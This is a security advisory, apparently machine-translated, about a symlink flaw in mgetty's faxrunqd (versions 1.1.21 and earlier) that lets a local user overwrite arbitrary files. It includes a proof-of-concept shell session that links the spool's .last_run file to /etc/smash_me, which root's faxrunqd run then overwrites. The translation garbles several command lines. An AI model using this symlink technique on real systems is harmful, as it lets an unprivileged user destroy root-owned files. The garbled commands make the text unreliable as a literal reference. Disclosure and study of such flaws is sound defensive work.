Linuxfaxrunqd file creation issues cause DoS Attacks

Article Title: Denial of Service (DoS) attacks caused by the creation of the Linuxfaxrunqd file. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.

　　Affected Systems:

Mgetty 1.1.21 and earlier

-Linux redhat 6.2 and earlier versions

-Linux-Mandrake 7.1 and earlier

-Other unix systems with problems with mgetty

Unaffected system:

Mgetty 1.1.22

　　Description:

Mgetty contains a faxrunqd program, which is used to send tasks in the fax queue generated by faxspool (1.

During execution, the program will create a. last_run file in the/var/spool/outgoing/directory.

The directory is writable by anyone. In some mgetty versions, the faxrunqd does not check whether the file exists.

Or a linked file. Therefore, attackers may overwrite any system file and cause a denial of service attack.

<* Source: Stan Bubrouski (satan@fastdial.net) *>

Test method:

　　Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

[User @ king/tmp] $ id

Uid = 200 (user) gid = 100 (users) groups = 100 (users)

[User @ king/tmp] $ ls-al/var/spool/fax/outgoing

Total 3

Drwxrwxrwt 3 root 1024 Jun 2 18:46.

Drwxr-xr-x 4 root 1024 Jun 2 ..

Drwxrwxrwx 2 root 1024 Jun 1 00:47 locks

[User @ king/tmp] $ ls-al/etc/smash_me

-Rw-r -- 1 root 12 Jun 2 18:45/etc/smash_me

[User @ king/tmp] $ cat/etc/smash_me

Smash me !!!

[User @ king/tmp] $ ln-s/etc/smash_me/var/spool/fax/outgoing/. last_run

[User @ king/tmp] $ ls-al/var/spool/fax/outgoing

Total 3

Drwxrwxrwt 3 root 1024 Jun 2 :48.

Drwxr-xr-x 4 root 1024 Jun 2 ..

Lrwxrwxrwx 1 user users 13 Jun 2 :48. last_run->

/Etc/smash_me

Drwxrwxrwx 2 root 1024 Jun 1 00:47 locks

Root console:

[Root @ king/tmp] # faxrunqd-l ttyS0

...

Remote unprivilaged user:

[User @ king/tmp] $ ls-al/var/spool/fax/outgoing

Total 3

Drwxrwxrwt 3 root 1024 Jun 2 :48.

Drwxr-xr-x 4 root 1024 Jun 2 ..

Lrwxrwxrwx 1 user users 13 Jun 2 :48. last_run->

/Etc/smash_me

Drwxrwxrwx 2 root 1024 Jun 1 00:47 locks

[User @ king/tmp] $ ls-al/etc/smash_me

-Rw-r -- 1 root 44 Jun 2 18:48/etc/smash_me

[User @ king/tmp] $ cat/etc/smash_me

Fri Jun 2 18:48:47 2000/usr/sbin/faxrunqd

　　Suggestion:

Mgetty 1.1.22 has solved this problem. You can download it at the following address:

Http://alpha.greenie.net/mgetty/